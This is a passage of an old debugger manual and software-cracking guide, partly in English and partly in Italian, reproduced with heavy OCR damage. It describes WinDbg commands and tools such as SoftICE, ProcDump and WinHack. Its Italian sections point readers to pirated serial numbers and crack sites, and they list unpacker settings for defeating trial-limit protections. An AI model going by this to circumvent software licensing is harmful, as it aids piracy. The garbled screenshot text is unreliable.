variables of the new frame. 


Use the KN command to list the call stack with the frame numbers. 
Syntax 

%[frame] 

Parameters 

frame 


The number of the frame on the call stack to change context to. The current 
procedure is number © on the stack. 


.attach Attach to Process 


Starts debugging the process specified by process. You can use PView to find 
process IDs of running programs. 


This command is equivalent to the /P command-line option. You can also click 
Attach to a Process from the Debug menu or press F6. 


Syntax 

.attach process 
Parameters 
process 


Process identifier of the task to debug, specified in decimal. Use the 0Ox prefix 
to specify the process identifier in hexadecimal. 


Remarks 


The process is attached until the debugger is terminated. There is no command to 
unattach. 


.break Debug Break 


.cache Cache Size 


WinDbg KD only 

Sets the size of the cache for WinDbg KD to use for memory values. 

Syntax 

.cache [cachesize] 

Parameters 

cachesize 

The size of the kernel debugging cache, in MB. If you do not specify cachesize, 
the command displays the status of the cache. If you issue the command .cache 0, 
the cache is disabled. 


Remarks 


Normal operations, such as single-stepping or the G command, invalidate the 
cache. If WinDbg KD has frozen the target computer, but hardware on the target 


can change memory (for example, through shared memory or DMA), you must disable 
the cache to see the memory changes. For more information, see Setting Kernel 
Debugger Options. 


.connect Establish Connection 


.disconnect Drop Connection 


.kill Terminate Process 


.list Display Source/Assembly Listing 


.-logappend Append Log File 


.-logclose Close Log File 


.-logopen Open Log File 


.Opt Set Option 


Sets debug options. To view the current debug option settings, use this command 
with no parameters. To modify a setting, specify the name of the debug option 
and the appropriate value, as indicated below. The view an individual debug 
option setting, specify only the name of the debug option. 

Syntax 

.opt [DebugOption] 

Parameters 


DebugOption 


This parameter be one of the following values. 


Value Meaning 

? Displays the list of supported debug options. 
AsmSymbols [on | off] If this setting is on, show symbols in disassembly. 
AsmRaw [on | off] If this setting is on, show raw data in disassembly. 
AttachGo [on | off] If this setting is on, do not stop debugging when a new 


process is attached. 
BackgroundSym [on | off]If this setting is on, load symbols in the background. 
CaseSensitive [on | off]If this setting is on, turn on case sensitivity. 
ChildGo [on | off] If this setting is on, do not stop debugging when a new 
child process is created. 
CommandRepeat [on | off]If this setting is on, ENTER repeats the last command. 


DIlEm filename Specifies the name of the execution model DLL. 

D11Sh filename Specifies the name of the transport layer DLL. 

DIlT1 filename [args]  Specifies the transport layer DLL. 

DllPath ["path"] Specifies the search path for symbols. 

EPStep [on | off] If this setting is on, the first step goes to the entry 
point, not to main. 

ExitGo [on | off] If this setting is on, do not stop debugging when a 


thread terminates. 

InheritHandles [on | off]If this setting is on, the target application inherits 
handles. This is useful for debugging debuggers. 

IgnoreAll [on | off] If this setting is on, ignore all messages about 
symbols. 

KdInitialBp [on | off] If this setting is on, kernel debugging stops at the 
initial breakpoint. 


KdEnable [on 


| off] If this setting is on, turn on the kernel debugger. 


KdGoExit [on | off] If this setting is on, go on exit. 

KdUseModem [on | off] If this setting is on, the kernel debugger uses modem 
controls. 

KdBaudRate [baud] Specifies the kernel debugger baud rate (1200, 2400, ..). 

KdPort [port] Specifies the kernel debugger communication port (COMI, 
COM2, ...). 

KdCacheSize [Size] Specifies the kernel debugger cache size, in bytes. 

KdPlatform [x86 | alpha]Specifies the kernel debugger target system. 

MasmEval [on | off] If this setting is on, turns on MASM-style expression 
evaluation. 

NotifyExit [on | off] If this setting is on, prints a message upon thread 
termination. 

NotifyNew [on | off] If this setting is on, prints a message upon thread 
creation. 

ShortContext [on | off] If this setting is on, displays abbreviated context 
information. 

Verbose [on | off] If this setting is on, turns on verbose output mode. 


. reboot Reboot Target Computer 
.reload Reload Symbols 

.Start Start Debugging 

.title Set Title 

BA Break on Access 


Sets a breakpoint that will be satisfied when the specified memory is accessed. 


This command is equivalent to the BP command with the following argument: 
zaddress [/Rcount]. 


Syntax 


BA {access}{size} {address} 


Parameters 
access 


The type of 


access that will satisfy the breakpoint. This parameter can be one 


of the following values. 


Value Meanin 


r Break 
w Break 
e Break 


size 


The size of 
can be 1, 2, 


address 
The address 


Remarks 


g 
on read access. 


on write access. 
on execute access. 


the location, in bytes, to be monitored for access. This parameter 
or 4. 


at which to start monitoring. 


This command provides the same functionality that the debug registers provide. 
You can break execution when the particular memory location is read from, 
written to, or executed. The following example sets a breakpoint for read access 
on four bytes of the variable var: 


ba r4 &var 


The breakpoint is satisfied only when the access occurs at the given address and 
for the specified number of bytes. If the memory accessed overlaps the specified 
area to monitor, the breakpoint is not satisfied. 

Note that although the size is required for all breakpoint types, an execute 
breakpoint is only satisfied if the address is the first byte in the 
instruction. 


BC Breakpoint Clear 


Removes one or more previously set breakpoints from the system. BC * clears all 
breakpoints. 


This command is equivalent to clicking Breakpoints from the Edit menu and 
clicking Clear or Clear All. 


Syntax 

BC {breakpoint [[breakpoint...]] | *} 

Parameters 

breakpoint 

The number of the breakpoint to be cleared. Use the Breakpoint List (BL) command 


to display currently set breakpoints and their numbers. Specify ranges of 
breakpoints with a hyphen. Separate multiple breakpoints with spaces or commas. 


BD Breakpoint Disable 


Disables, but does not delete, one or more breakpoints. BD * disables all 
breakpoints. While a breakpoint is disabled, the system does not check to see if 
the conditions specified in the breakpoint are valid. 


Use the BE command to reenable a disabled breakpoint. 

This command is equivalent to clicking Breakpoints from the Edit menu and 
clicking Disable. 

Syntax 

BD {breakpoint [[breakpoint...]] | *} 

Parameters 

breakpoint 

The number of the breakpoint to be disabled. Use the Breakpoint List (BL) 
command to display currently set breakpoints and their numbers. Specify ranges 


of breakpoints with a hyphen. Separate multiple breakpoints with spaces or 
commas. 


BE Breakpoint Enable 


Restores one or more breakpoints that were temporarily disabled by the BD 
command. BE * enables all breakpoints. 


This command is equivalent to clicking Breakpoints from the Edit menu and 
clicking Enable. 


Syntax 

BE {breakpoint [[breakpoint...]] | *} 

Parameters 

breakpoint 

The number of the breakpoint to be enabled. Use the BL command to display 


currently set breakpoints and their numbers. Specify ranges of breakpoints with 
a hyphen. Separate multiple breakpoints with spaces or commas. 


BL Breakpoint List 


Lists all breakpoints. 
This command is equivalent to clicking Breakpoints from the Edit menu. 
Syntax 
BL 
Remarks 
For each breakpoint, the command displays the following: 
The breakpoint number 
The breakpoint status, where "E" is for enabled, "D" is for disabled, "V" 
is for virtual, and "U" is for unknown address. A virtual breakpoint is a 
breakpoint for code that is not currently loaded. 
: The conditional information specifying the breakpoint, such as the 
address, expression, and length. If a breakpoint has a pass count, the remaining 


number of times that the breakpoint will be ignored is listed in parentheses. 


BL also displays commands to execute, message/message classes (in the case of 
message breakpoints), thread and process number. 


See Also 


Context Operator 


BP Set Breakpoint 


Sets a breakpoint. You can combine locations, conditions, and options to set 
different kinds of breakpoints. If you do not specify a thread, the breakpoint 
will apply to all threads. 


This command is equivalent to clicking Breakpoints from the Edit menu and 
clicking Add. 


Syntax 
[[thread]] BP[[breakpoint]] [[location]] [[condition]] [[option...]] 


Parameters 


thread 


The thread that the breakpoint will apply to. For more information, see Process 
and Thread Syntax. 


breakpoint 


The breakpoint number to be set. If the given breakpoint number already exists, 
the new breakpoint will replace the old. 


location 
The memory location of the breakpoint, in the format given in the table below. 
condition 


One of the breakpoint conditions given in the table below. You can specify 
multiple conditions for a breakpoint. 


option 


One of the breakpoint options given in the table below. Separate multiple 
options with spaces. 


Remarks 


If you want to put a breakpoint on a C++ public, enclose the expression in 
parentheses. For example, "BP (??MyPublic)" or "BP (operator new)". 

On x86 computers, Windows Debugger will use debug registers to implement 
breakpoints if: 


there is a debug register available 

memory size is 1 

memory size is 2 and address is WORD aligned 
memory size is 4 and address is DWORD aligned 


You can use the following options when setting a breakpoint: 


Location Description 
[[{[[procedure]], [[module]], [[exe]]}]] 
address The address for the breakpoint. 


[[{[[procedure]], [[module]], [[exe]]}]] 


@line The line number for the breakpoint. 

Condition Description 

?expression Break if expression is true. 

zaddress [[/Rcount]] Break if memory at address has changed. Use the /R 
option to specify the number of bytes to check (default is 1). 

Option Description 

/Pcount Ignore the breakpoint count times. 

/Ccemdlist Execute cmdlist when the breakpoint is hit. The cmdlist parameter is 
a semicolon-separated list of one or more debugger commands. If cmdlist includes 
multiple commands, enclose it in quotes ("). 


/Mmessagename 

/Mmessageclass Break only if the given Win32 message or message class has 
been received. 

/Q Suppress the unresolved-breakpoint dialog box for this breakpoint. 


/Hprocess Specify the process number to attach the breakpoint to. Defaults to 
all threads in the process if /T is not used.If /H is not specified and no 
target application is running, the default is process 0. 

/Tthread Specify the thread number to attach the breakpoint to. Defaults to 
the current process if /H is not used. 

See Also 


Context Operator 


Cc Compare Memory 


Compares the values held in two memory areas. Specify the first area with the 
range parameter. Specify the starting address of the second area with address. 
The second area is the same length as the first. If the two areas are not 
identical, Windows Debugger will display all memory addresses in range where 
they do not agree. 

Syntax 

C range address 

Parameters 

range 

The first memory area to compare. For more information, see Range Syntax. 


address 


The starting address of the second memory area. 


DA, DB, DC, DD, DI, DS, DT, DU, DW Display Memory 


Displays the contents of memory in the given range. Each line shows the address 
of the first byte in the line, followed by the contents of memory at that and 
following locations. 


If you omit range, the command will display memory starting at the ending 
location of the last display command. This allows you to continuously scan 
through memory. 

This command is equivalent to clicking Memory from the View menu, or pressing 
ALT+5. 


Syntax 

D{A|B|C|D|I|S|T]U|w} [[range]] 

Parameters 

range 

The memory area to display. For more information, see Range Syntax. 

Remarks 

When Windows Debugger is displaying ANSI or Unicode characters, it will stop 
displaying characters at the first null byte. When displaying ANSI characters, 
all characters, including non-printable characters, are displayed using the 


current code page character set. With Unicode, all non-printable and non- 
mappable characters are displayed as dots. 


Command Definition Displays 

DA Display ANSI ANSI (extended ASCII) characters 

DB Display Bytes (char) Byte values and ANSI characters 

DC Display Code Assembly-language instructions (disassembly) 


DD Display Double Words (long) Double-word (four-byte) values and ANSI 
characters 


DI Display 8-Byte Reals (double) 8-byte hexadecimal values and floating-point 
representations 

DS Display 4-Byte Reals (float) 4-byte hexadecimal values and floating-point 
representations 

DT Display 10-Byte Reals (long double) 10-byte hexadecimal values and 
floating-point representations 

DU Display Unicode Unicode characters 

DW Display Words (short) Word values and Unicode characters 

Note With the DC (Dump Code) command, you can use the standard range syntax or 
startaddress L line to dump line instructions starting at startaddress. 


EA, EB, ED, EI, ES, ET, EU, EW Enter Values 


Enters the values that you specify into memory. If you do not specify any 
values, the current address and the value at that address will be displayed. You 
can then enter a new value, preserve the current value in memory by pressing the 
space bar, or stop entering data by pressing ENTER. 


This command is equivalent to clicking Memory from the View menu, or pressing 
ALT+5, and entering values. 


Syntax 

E{A|B|D|I|S[|T]|U|W} address [[values]] 
Parameters 

address 

The starting address at which to enter values. 
values 


One or more values to enter into memory. Separate multiple numeric values with 
spaces. 


Remarks 


When entering numeric values, you can use C-style radix prefixes to override the 
default radix. Prefix octal constants with a "00" (for example 001776), 
hexadecimal constants with "0x" (for example 0xF000), and decimal constants with 
"ot" (for example 0t199). 

When entering ANSI or Unicode values, you can include space (" ") characters by 
enclosing the character string in quotation marks (" or '). If you enclose the 
string in double quotation marks, Windows Debugger will automatically null- 
terminate the string. Single quotation marks (') will not add a null character. 
You can enter standard C escape characters, such as \t, \007, and \". 


Command Enter 

EA ANSI (extended ASCII) characters 
EB Byte values 

ED Double word (four-byte) values 
EI Floating-point numbers (8-byte) 
ES Floating-point numbers (4-byte) 
ET Floating-point numbers (10-byte) 
EU Unicode characters 

EW Word values 


F Freeze Thread 


Freezes the given thread, causing it to stop and wait until it is unfrozen. 
Other threads will continue to execute. If no thread is specified, the current 
thread is frozen. 

Use the Z (Unfreeze thread) command to reenable the thread. 

This command is equivalent to clicking Threads from the Debug menu, then 
clicking Freeze or Freeze All. 

Syntax 

[[thread]] F 

Parameters 


thread 


The thread to be frozen. For more information, see Process and Thread Syntax. 
FIA, FIB, FID, FII, FIS, FIT, FIU, FIW Fill Memory 


Fills the memory area specified by range with pattern. The entire range will be 
filled by repeatedly storing pattern into memory. 


Syntax 

FI{A|B|D|I|S|T|U]|W} range pattern 

Parameters 

range 

The memory area to fill. For more information, see Range Syntax. 
pattern 


One or more values to fill memory with. Separate multiple numeric values with 
spaces. 


Remarks 


When entering numeric values, you can use C-style radix prefixes to override the 
default radix. Prefix octal constants with a "00" (for example 001776), 
hexadecimal constants with "0x" (for example 0xF000), and decimal constants with 
"ot" (for example 0t199). 

When entering ANSI or Unicode values, you can include space (" ") characters by 
enclosing the character string in quotation marks (" or '). If you enclose the 
string in double quotation marks, Windows Debugger will automatically null- 
terminate the string. Single quotation marks (') will not add a null character. 
You can enter standard C escape characters, such as \t, \007, and \". 


Command Definition Fill 


FIA Fill ANSI ANSI (extended ASCII) characters 


FIB Fill Bytes (char) Byte values 

FID Fill Double Words (long) Double-word (four-byte) values 
FII Fill 8-Byte Reals (double) Floating-point numbers 

FIS Fill 4-Byte Reals (float) Floating-point numbers 

FIT Fill 10-Byte Reals (long double) Floating-point numbers 

FIU Fill Unicode Unicode characters 


FIW. Fill Words (short) Word values 


FR Floating-Point Registers 


G Go 

GH Go- Exception Handled 

GN Go- Exception Not Handled 
K, KB, KN, KS, KV Display Stack Backtrace 


Displays the stack frame of the given thread. 

Syntax 

[[thread]] K[BNSV] [[framecount]] [[=frameaddr stackaddr programcounter]] 
Parameters 

thread 


The thread whose stack is to be displayed. For more information, see Process and 
Thread Syntax. 


framecount 
Number of stack frames to display. 


frameaddr 
stackaddr 
programcounter 


When examining a corrupted stack on an x86 computer, you can walk the 
uncorrupted portion of the stack by specifying its frame address, stack address, 
and program counter. This requires detailed knowledge of how the stack works. 


Remarks 


Each display line shows the name or address of the procedure called, the 
arguments used on the call, and the address of the statement that called it. You 
can use any or all of the options in a single command; for example, K, KB, and 
KBNSV are valid commands. The following table describes the effect of the 
options: 


Option Effect 
none Displays the basic call stack based on debugging information in the 
executable. It displays the frame pointer, return address, and function names. 


B Additionally displays the first three parameters of each function. 

N Additionally displays the frame numbers for each call. 

S Additionally displays source module and line number information for each 
call. 

V Additionally displays runtime function information. 

L Restart Debuggee 


LM List Loaded Modules 


Lists the specified loaded modules. 


Syntax 


LM [/s [/0] ] [/f ] [modulename] 
Parameters 
/S 


List segmented modules. If you do not specify a module name, LM will list all 
loaded modules. 


/f 

List flat modules. 

/0 

Sorts segmented modules by selector. 
modulename 

Module to list. 

Remarks 


If /f and /s are both absent from the command line, LM will assume both; the 
following two commands are equivalent: 


> LM 

> LM /f /s 

Segmented modules are sorted by module name, then selector, unless you specified 
/o. Flat modules are sorted by base address. 

LN List Nearest Symbols 

Displays the symbols at or near the given address. You can use this command to 
help determine what a pointer is pointing to. It also can be useful when looking 
at a corrupted stack to determine which procedure made a call. 

Syntax 

LN address 

Parameters 


address 


The address to search for symbols. 


M Move Memory 

N Set Number Base 
P Program Step 

Q Quit WinDbg 

R Registers 


Displays or modifies registers. If you do not specify a thread, the current 
thread is used. 


This command is equivalent to clicking Registers from the View menu, or pressing 
ALT+4. 


Syntax 

[[thread]] R [[register [[=value]] ]] 
Parameters 

thread 


The thread from which the registers are to be read. For more information, see 
Process and Thread Syntax. 


register 

The register to display or modify. 

value 

The value to assign to the register. 

Remarks 

If you do not specify a register, all of the registers are displayed. If you 
specify a register, the command displays the current value of the register. If 
you specify both a register and a value, the command changes the register to 
contain the value. 


Use the FR (Floating-Point Registers) command to view and modify floating-point 
registers. 


REMOTE Start Remote Server 


RT Register Display Toggle 


St, S- Set Source/Assembly Mode 


SA, SB, SD, SI, SS, ST, SU, SW Search Memory 


Searches though memory to find a specific byte pattern. If the pattern is found, 
Windows Debugger will display the first memory address in range where it was 
found. 


Command Fill 

SA ANSI (extended ASCII) characters 
SB Byte values 

SD Double-word (four-byte) values 
SI Floating-point numbers (8-byte) 
SS Floating-point numbers (4-byte) 
ST Floating-point numbers (10-byte) 


SU Unicode characters 
SW word values 
Syntax 


S{A|B[|D|I|S|T|U|W} range pattern 


Parameters 


range 


The memory area to search through. For more information, see Range Syntax. 
pattern 


One or more byte values or ANSI or Unicode characters to search for. Separate 
multiple values with spaces. 


Remarks 


When entering numeric values to search for, you can use C-style radix prefixes 
to override the default radix. Prefix octal constants with a "00" (for example 
001776), hexadecimal constants with "©x" (for example 0xF000), and decimal 
constants with "Ot" (for example 0t199). 

When entering Unicode values to search for, you can include space (" ") 
characters by enclosing the character string in quotation marks (" or '). If you 
enclose the string in double quotation marks, Windows Debugger will 
automatically null-terminate the string. Single quotation marks (') will not add 
a null character. You can enter standard C escape characters, such as \t, \007, 
and \"., 


SX, SXD, SXE, SXN Set Exceptions 


Controls the behavior of the debugger when trapping exceptions before executing 
exception-handling code. The debugger always halts before execution returns from 
the exception handler. 


Command Action 

SX Displays the events that the debugger will halt for. 

SXD Causes the debugger to ignore the specified exception and issue an 
automatic GN command. 

SXE Causes the debugger to halt at the specified exception. 

SXN Causes the debugger to display a message before the exception is passed to 
the target application, and causes Windows Debugger to issue a GN command after 
the message is displayed. 

Syntax 


SX [[exception]] 

SXE exception [[message]] [[/Ccmdlist1]] [[/C2cmdlist2]] 

SX{D|N} exception [[message]] [[/C2cmdlist2]] 

Parameters 

exception 

The exception number that the command acts upon, in the current radix. If you do 
not specify an exception, the SX command will display information on all 
exceptions. 

message 

Message to display in the command window when the exception is trapped. 

cmdlisti 

Semicolon-separated list of Windows Debugger commands to execute when an 
exception is first raised. The /C option is permitted only with the SXE command. 


Enclose in quotes if cmdlist1 includes spaces or semicolons. 


cmdlist2 


Semicolon-separated list of commands to execute after an exception has not been 
handled. Enclose in quotes if cmdlist2 includes spaces or semicolons. 


Remarks 


The /C option (allowed only with SXE) tells the debugger to execute the 
specified commands on the first chance (before the exception is passed to the 
application). The /C2 option tells the debugger to execute the specified 
commands on the second chance (if the exception is not handled by the debugger 
or the application). For more information, see the Platform SDK documentation on 
structured exception handling. 

When the debugger stops due to an exception, only the GN (Go-- Exception Not 
Handled) and GH (Go-- Exception Handled) commands can be used to continue 
execution. The SXD and SXN commands automatically call GN. 


T Trace 


Executes the instruction or source line at the instruction pointer and displays 
the resulting values of all registers and flags. Use the P (Program Step) 
command to have the debugger execute subroutine calls or interrupts without 
returning control to the debugger. 


This command is equivalent to clicking Step Into from the Debug menu, or 
pressing F11 or F8. 


Syntax 

[[thread]] T [[count]] 
Parameters 

thread 


The thread to trace through. For more information, see Process and Thread 
Syntax. 


count 


The number of instructions or source lines (depending on the Source/Assembly 
mode) to step through before stopping. 


U Unassemble 


Xx Examine Symbols 


Displays the symbols in all contexts that match pattern. If you do not specify 
any options, all except public symbols are searched. If you do not specify a 
pattern, all symbols will be displayed. To ignore case in the search, click 
Options from the View menu, click Debugger, and click Ignore Case. 

Syntax 

X[[options]] [[ { [[procedure]], [[module]], [[executable]] } ]] [[pattern]] 


Parameters 


options 


Specifies the scope of the symbol search. These options cannot be separated by 
spaces and must immediately follow the XxX (for example, XEM). Use the following 
letters to specify scope: 


Letter Scope 

The current class. 

A11l modules in the executable or DLL, except for the current module. 
The current function. 

All global symbols. 

The current code block (lexical scope). 

The current module. 

All public symbols. 

procedure, module, executable 


U0Z=sSrQOTNANMO 


The area to search. For example, {function1, srcfile.c, target.dll} will search 
function1 from srcfile.c in target.dll. This is identical to the breakpoint 
context operator. 

pattern 


A pattern to search for. The ? and * wildcards are supported. 


Z Unfreeze Thread 


Una caratteristica interessante è legata alla possibilità di usare il debugger 
per l’analisi dei post mortem. 

Quando capita un pasticcio e il sistema salta viene ricercato nel registro il 
valore della voce 


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug 
Settate la seguente linea di comando. 

windbg -p %ld -e %ld 

Quando un programma salterà verà 


chiamato il debugger 
automaticamente. 


PROGRAMMI CON BORLAND C 


Tml=<PU E0465 
:0041173F A3E8 


Alla pari dei programmi e delle 
utilities fornite con Microsoft 
Visual C++ anche con il Borland 
Cc vengono forniti alcuni 
software che possono essere 
utilizzati per vari scopi. 

Il TURBO DEBUGGER è presente nel 
pacchetto per DOS, WINDOWS 16 e 
WINDOWS 32. 

Anche la versione per Windows 95 
dispone di un interfaccia a 
carattere. 

La tipologia dei breakpoints 
settabili è abbastanza completa 
permettendo diverse funzioni. 

TD permette inoltre il tracing 
dell’heap. 

Le chiamate relative alle call 
sono composte in modo tale che è 
sempre possibile vedere a quale 


modulo è indirizzata la chiamata. 
Un utility fornita insieme è WINSIGHT che è paragonabile a Spy++. 
WS permette di monitorare i messaggi relativi alle Windows presenti sul desktop. 


WINHEX 8.32 | 


Si tratta di uno dei pochi che dispone di un editor che permette di visualizzare 
direttamente i settori su disco senza doversi appoggiare ad un file. 

Chiaramente bisogna prestare attenzione a non danneggiare qualche settore del 
disco critico. 


SOFTICE 3.x - 4.x 
SoftICE 3.24 
http://www.numega.com 


010 pioneer ai 


SoftIce anche se di fatto a 


questo debugger è dedicato ee nina o_| 
più avanti un intero Ei Piscompule Object Size C Use estemal predurp 

capitolo. MW Ophmize FE stustue È, dig alri f0002020 [me Rit 
Sicuramente qui parliamo del 1 Check Herder Sections pani 

massimo anche se di fatto è È SR Bisi I (iiaiia lia conii 

abbastanza. più complicato nea T" \loncra faut 

degli altri debugger . € Dontiebutt impor FP toxcht] 

Le complicazioni sono legate (sc artici imooitirioa FE/Raw Loade: Options 

al numero enorme di C Arbuild import table I Force raw mode 

funzionalità possedute dal C Rebuid new importteble T Meigsccdsintoanunigue section. — 1 gava 


programma. 
La NuMega distribuisce tra lo shareware il debugger anche se di fatto è 
possibile trvare in 
giro i numeri di 
serie. 


Penso che sia |P ProcDump32 (0) G-Rok. Riz Lat and Stone 
inutile ricordare 
che sul sistema di cindons'spstembidiep re FFFROB 41 NON0DNODNO — FFFOI2S] 
ricerca ASTALAVISTA cApiogiammAmizionalt cffrcetoflieWwin.. FFFA0125 300 00625000 FFFEAZBS 
( parodia ad c:Aprogram lilestnestech softwaretwina . FFFCITES. 00800000 000580 — FFFEASBS 

I A x cspiogziammbtechemith\snagtàZsnagil... FFFASBF9 0040000 0000890) FFFEAZBE 
Altavista) e cwirhies esterna! di FFF9123] 00000000 0000000) FFF94EOS 
possibile trovare i cAhulikyApiocdump+piocdump ene FFF8F1E9 00400000 00012000 FFFD2343 - 
cracks di quasi 


tutti i programmi | Modue {MD |Acdese {Size | 
essistenti. 

SoftIce possiede 
una parte caricata 
in memoria che 
viene attivata 
mediante la 
pressione dei tasti 
CTRL D o quelli 
settati mediante apposite istruzioni. 

Inoltre SoftIce possiede un buffer che permette il back trace ovvero 
l’esecuzione a ritroso del codice. 


PROCDUMP 


ProcDump riesce ad eseguire un Dump su disco di un programma in esecuzione e ad 


eseguire funzioni di unpack/decrypt su 
Activision Packer, 


Manolo, 


WWPACK32 e molti altri. 


NeoLite, 


Choose Unpacker 


*Unknown” 
Hasiuk/NeoLite 


Shrinker 3.2 
Shrinker 3.3 
Standard 

Vbox Dialog 


sistemi software tipo BJFNt, ENC, 
Petite, Securom, VBOX, Shrinker 3,2&3.3, 
Vbox è sicuramente uno dei più utilizzati 
per la gestione delle limitazioni del 
software a n giorni. 

Molti sistemi di protezione sono cryptati in 
memoria per cui sono difficilmente 
debuggabili con software tipo SoftIce ecc. 
ProcDump possiede diversi sistemi per 
bypassare diversi sistemi software e creare 
dei dump decodificati. 


In alcuni casi ProcDump rende inutile 
l’utilizzo di debugger. 
ProcDump possiede diverse opzioni 


possibile utilizzare a seconda del tipo di 


software con cui si ha a che fare. 


La seguente, 


invece, 


che mostra le varie opzioni. 


La finestra a fianco mostra alcuni dei 
metodi di packing inclusi in procdump. 


è una tabella trovata su internet a riguardo di ProcDump 


Name Method Options Section To remove after 
BJFNT 1.x *unknown* Create new import. Last one. 
Do not recompute obj. 
ENC 0.1 Standard Do not recompute obj. 
HASIUK used HASIUK Default None 
by Activision /NeoLite 
LOUIS Cryptor Standard Default Last section 
Do not recompute obj. 
Manolo Manolo Rebuild Import Table .manolo section 
NeoLite x.xx HASIUK Default None 
/NeoLite 
PECRYPT32 none Depend on version 
PELOAD Standard Do not recompute obj. .peload section 
PELOCK none last one 
PEPACK PEPack Rebuild Import Table PEPACK!! section 
PESHiELD <0.2 PESHiELD Do not recompute obj. @ANAKIN98 section 
Petite Petite Default .petite section 
Petite Petite 2 Create new import .petite section 
U will need to fix 
reloc pointer too. 
Securom Standard Original CD required. Better not touch ;) 
Do not recompute obj. 
Shrinker 3.2 Shrinker32 Ignore Faults .-load object at least 
Rebuild Import Table 
Shrinker 3.3 Shrinker33 Do not recompute obj. None 
Rebuild Import Table 
STNPE 1.xx Standard Do not recompute obj. 
TimeLock 3.x Vbox Create new import WeiJunLi section 
std/bialog Ignore Faults 
VBox Vbox Std Create new import WeiJunLi section 
Ignore Faults 
Do not recompute obj. 
VBox with TRY Vbox Create new import WeiJunLi section 
dialog Dialog Ignore Faults 
Do not recompute obj. 
WwPack32<1.10 WWPACK32 I Default .WWP32 section 


WwPack32 1.10 


WWPACK32 II Default 


.WWP32 section 


WwPack32 1.11 WWPACK32 I Default .WWP32 section 


REGSNAP 


(Cc) 1998 Vitas Ramanchauskas, vitas@soft4you.com 


Compare snaps 


Fio snapshot 


Second manshot 


DINTE MPAegsnp2 ros e —’ iaesnò | 


Not==. RiegS nap val automata detem snep orde: using bme stermp 


Asport oplicns |avalsble n registered verrion only!) 


VICSIOSRTÀ ISIS aa 
ott snapshote mrusi wac caved wkh valussl 
ui Ci-si-iai= REC fil ili rr dt 


Leg atvy Moved 


Flo Opiore Sonch Het 


Q_ ue n 


£ 


Dulput filename 


[Reano Aegsnp2 him 
OUttpit file format: ( Plants (© HTRL Advanced option | 


Cance__] 


£ 


FEEFFFEFIECELETETEREIEE 


Come dicevo prima spesso è utile analizzare e comparare la configurazione del 
sistema prima e dopo le installazioni di software. 

RegSnap riesce a svolgere delle funzionalità di questo tipo in quanto scatta 
delle panoramiche al registro di windows, ai files system.ini e win.ini e alle 
directory \windows e \windows\system. 

Dopo aver scattato queste foto al sistema è in grado di salvarle su disco e 
successivamente di confrontarle creando un file html in cui vengono riportate le 


Esistono programmi che permettono di monitorare in tempo reale gli accessi al 


differenze. 

registro. 

Uno di questi è REGMON.EXE che 
oltre ad avere questa 


possibilità può settare dei 
filtri per mettere sotto 
analisi solo i messaggi 
generati da alcune procedure. 

Alcuni programmi controllano 
la presenza di questo tipo di 
analizzatori e generano errori 


nel momento in cui si 
accorgono di essere 
“osservati”. 

Personalmente preferisco i 


programmi che eseguono analisi 
in modo non dinamico. 

Il programma REGEDIT fornito 
con windows è troppo 
rudimentale per essere 
utilizzaro in quanto permette 
soltanto di eseguire funzioni 
di scrittura o di lettura. 
Installando un nuovo software 
è impossibile sapere quali 


File: Assistanto Help 


Procstà: |FFFD7ES5 - TASKMON EXE =] Memory Stanjs 00400000 End:|g20370000 Quit 
Mena Search | Edi Memo | Tag Lists | Create = Memory Tiainet | Optians | 
Seachfr ——_ 


( DFloat (© Byte 
( Com (© Word 


Search Results 


C Dwad 
( Angthng © Fisat riti | 
Type ot Seaich: 
(© Changed To: [ 
( Incressed By Ò 


1 Incressedì by More lhen È 
( Incressedì by Less than 


C Deciesred By: 
( Deciesred by More han È 
( Deciesred by Less than & 


C Has Increased 
( Has Decreased 


( Has Changed 
(C Has Nol Meanged 


voci inserirà , quali modificherà e quali cancellerà. 


RegSnap, come ho già detto, è 


molto dettagliato anche se dai programmi di 


protezione bisogna attendersi qualche sutterfugio per bypassare questo tipo di 


utilities. 


WINHACK 


WinHack v2.00 
http://www.malinverni.com 
grant@malinverni.com 


Alcuni lavori di questo tipo non sono orientati ad eliminare le limitazioni dei 
programmi ma invece il loro compito è quello di trovare delle cheat words per 
acquisire proprietà particolari nei giochi come ad esempio attraversare i muri, 
diventare invincibile ecc. 

Uno dei problemi fondamentali 


. a . i Ei Ele Edit Set Iods Show *Winio#:s Heb 
negli attacchi ai programmi è elela erala]T]a 
pria legato a reperimento sa re [=|rale 
stringhe, codici ecc. che 
permettano: ereare: Ter rouELies 
SESLrAC Ir rci E si 
Un programma adattissimo a fare SoCAT1® 2 ASYHGSETGETITENPROPERTY 
ricerche in memoria eseguite su Rocatte [i }-—== 
programmi già caricati e’ SOCATAM Last update i 67/68/95. 
WinHack. 3DCAT18 Mmogue type 1 uDoWS executable (16 bits) 
entita Filepescription 3 negmetrla 3D F/xBBHaintenance t 
spe ileVersion ria PS 
WinHack è altamente Epcar19 l'colicepacisne : ASINI pes tile 19 
5 : ; "i A] InternalNane : Gecko 
specializzato l no ricerche Fraunciene © UL Resoniria MESIA 
utilizzando diverse tipologie, 6 rrogectscizloni i leDizro n 
per la precisione, tra cui due Ta — 
tipi da 64 bits. ee] 


Il programma dispone internamente anche di un TrainerCreator interno. 

WinHacker possiede una libreria di API che permette di agganciarsi a funzioni di 
ricerca da programmi nostri esterni. 

Il sistema di ricerca di WinHack si basa sullo scatto di una panoramica iniziale 
e i successivi confronti alla ricerca di determinati valori. 

In un programma di giochi esistono valori che indicano la potenza del 
personaggio, il suo stato di salute, la quantità di cibo ed altri valori. 

Si carica il gioco e successivamente WinHack chiedendo di scattare la prima 
panoramica. 

Ad un certo punto supponiamo che il valore di salute del personaggio sia passato 
dal 100 iniziale al 57 attuale. 

A quest50 punto si cerca la locazione di memoria in cui il valore è cambiato da 
100 a 57. 

Trovato questo indirizzo si può modificare il suo valore come si vuole. 

WinHack è in grado di creare i moduli memory trainer utilizzabili per settare i 
valori voluti al di fuori di WinHack. 

Quando si cerca di attaccare un software bisogna seguire delle regole logiche 
che servano a stabilire quale è il metodo migliore per intervenire. 

In primis guardiamo quali DLL e altri moduli il software carica al momento della 
sua attivazione. 

Per fare questo esistono molti software tra i quali SCANBIN è uno di questi. 

Una delle cose fondamentali è quella di sapere quali files sono caricati dal 
programma ed in particolar modo le api 
exportate. 

SCANBIN dispone di un certo numero di opzioni 
selezionabili tramite voci di menu che 
permettono la visualizzazione di molti tipi di 
Imported references informazioni. 

Exported references L'individuazione a priori delle funzioni 
Used DLL list utilizzate dalo programma in analisi permette 
